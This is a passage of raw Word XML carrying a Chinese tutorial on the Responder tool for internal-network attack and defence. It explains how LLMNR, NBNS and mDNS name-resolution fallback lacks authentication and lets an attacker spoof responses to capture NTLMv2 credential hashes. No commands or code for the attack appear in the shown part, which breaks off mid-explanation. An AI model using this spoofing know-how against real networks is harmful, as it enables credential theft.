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5E6" w:rsidRDefault="00007BE2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内网渗透之</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻防（上）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="header-n2"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前言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偶然中得知了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这款工具，在了解的过程中根据这款工具的使用、技术原理引出一大片知识点和工具，由于篇幅原因某些地方不会展开，但是各位看官可以根据自己积累的知识进行查漏补缺，相信会有一定收获。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="header-n4"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>什么是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Responder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在攻防领域，欺骗从来都是技术热点区域，不管是攻守双方均会使用欺骗来进行技术上的对抗，对于防守方来说，蜜罐就是欺骗防御的代表安全产品，而对于攻击方来说，钓鱼网页、鱼叉附件等欺骗手段更是家常便饭。在内网攻防中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就是一个不得不说的工具，就连</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击方天花板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大名鼎鼎的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>组织也有使用过该款工具，有证据表明，俄罗斯的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>组织</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--APT28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>曾今使用过这款工具进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击。今天就来介绍一下这款工具的原理及其使用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>APT-28</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>https://attack.mitre.org/groups/G0007/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="header-n7"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:t>欺骗原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="header-n8"/>
      <w:r>
        <w:t>基本协议</w:t>
      </w:r>
      <w:r>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NBNS</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>MDNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:t>之前，我们要先了解</w:t>
      </w:r>
      <w:r>
        <w:t>windwos</w:t>
      </w:r>
      <w:r>
        <w:t>默认开启的三种协议，这三种协议分别是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>链路本地多播名称解析（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>、名称服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (NBNS) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>协议和多播</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mdns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>）协议</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="header-n10"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLMNR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>链路本地多播名称解析（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是一个基于域名系统（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）数据包格式的协议，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IPv4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IPv6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的主机可以通过此协议对同一本地链路上的主机执行名称解析。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>操作系统从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Vista</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开始就内嵌支持，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统也通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实现了此协议。它通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UDP 5355</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口进行通信，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IPV6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="header-n12"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NBNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2" w:rsidP="005F2104">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:ind w:leftChars="100" w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>网络基本输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>输出系统</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (NetBIOS) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>名称服务器</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (NBNS) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:t>上的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NetBIOS (NetBT) </w:t>
      </w:r>
      <w:r>
        <w:t>协议族的一部分，它在基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NetBIOS </w:t>
      </w:r>
      <w:r>
        <w:t>名称访问的网络上提供主机名和地址映射方法。通过</w:t>
      </w:r>
      <w:r>
        <w:t>UDP 137</w:t>
      </w:r>
      <w:r>
        <w:t>端口进行通信，但</w:t>
      </w:r>
      <w:r>
        <w:t>NBNS</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>IPV6</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="header-n14"/>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mdns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在计算机网络中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多播</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（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mDNS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）协议将主机名解析为不包含本地名称服务器的小型网络中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>它是一种零配置服务，使用与单播域名系统</w:t>
      </w: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DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>基本相同的编程接口，数据包格式和操作语义。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>虽然</w:t>
      </w:r>
      <w:r>
        <w:t>Stuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cheshire</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>mDNS</w:t>
      </w:r>
      <w:r>
        <w:t>设计为独立协议，但它可以与标准</w:t>
      </w:r>
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t>服务器协同工作</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。它通过</w:t>
      </w:r>
      <w:r>
        <w:t>UDP 5353</w:t>
      </w:r>
      <w:r>
        <w:t>端口进行通信，且</w:t>
      </w:r>
      <w:r>
        <w:t>MDNS</w:t>
      </w:r>
      <w:r>
        <w:t>也支持</w:t>
      </w:r>
      <w:r>
        <w:t>IPV6</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>目前仅有</w:t>
      </w:r>
      <w:r>
        <w:t>windows 10</w:t>
      </w:r>
      <w:r>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:t>mdns</w:t>
      </w:r>
      <w:r>
        <w:t>，经测试发现，禁用了</w:t>
      </w:r>
      <w:r>
        <w:t>llmnr</w:t>
      </w:r>
      <w:r>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:t>mdns</w:t>
      </w:r>
      <w:r>
        <w:t>也会被禁用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="003445E6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2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总的来说，以上几种协议在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中都是默认启用的，主要作用都是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器解析失败后，尝试对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>主机名称进行解析，正因为默认启用、且实现方式又类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议，并没有一个认证的过程，所以就会导致各种基于这两种协议的欺骗行为，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正是通过这种方式，欺骗受害机器，并使受害机器在后续认证中发送其凭证。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域内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>主机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例如当域内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>win10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>主机在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一个不存在的主机名时，会按照下列流程尝试解析（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>win10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>有不同表现）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>查看本地</w:t>
      </w:r>
      <w:r>
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t>缓存，</w:t>
      </w:r>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:t>可使用命令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ipconfig/displaydns </w:t>
      </w:r>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE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尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NBNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MDNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议进行解析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>域内</w:t>
      </w:r>
      <w:r>
        <w:t>win10</w:t>
      </w:r>
      <w:r>
        <w:t>主机</w:t>
      </w:r>
      <w:r>
        <w:t>ping win-test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16068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0917455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由上图可以看出，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解析失败后，会通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MDNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NBNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>再次尝试进行解析，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MDNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分别向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>224.0.0.252</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>224.0.0.251</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IPV4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多播地址进行广播，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NBNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>则是向广播地址进行广播。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lastRenderedPageBreak/>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>224.0.0.252</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>224.0.0.251</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IPV4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多播地址，具体关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IPV4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多播地址的更多信息可以自行查找相关资料。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="header-n34"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>为何会发送</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM V2 Hash?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>根据上述知识，我们知道了</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>如何欺骗受害主机，那么为什么受害主机会发送</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM v2 Hash</w:t>
      </w:r>
      <w:r>
        <w:t>呢？这就涉及到</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r>
        <w:t>认证的知识了，早期</w:t>
      </w:r>
      <w:r>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>协议在网络上传输明文口令，后来微软进行了改进推出了</w:t>
      </w:r>
      <w:r>
        <w:t>NTLMv1</w:t>
      </w:r>
      <w:r>
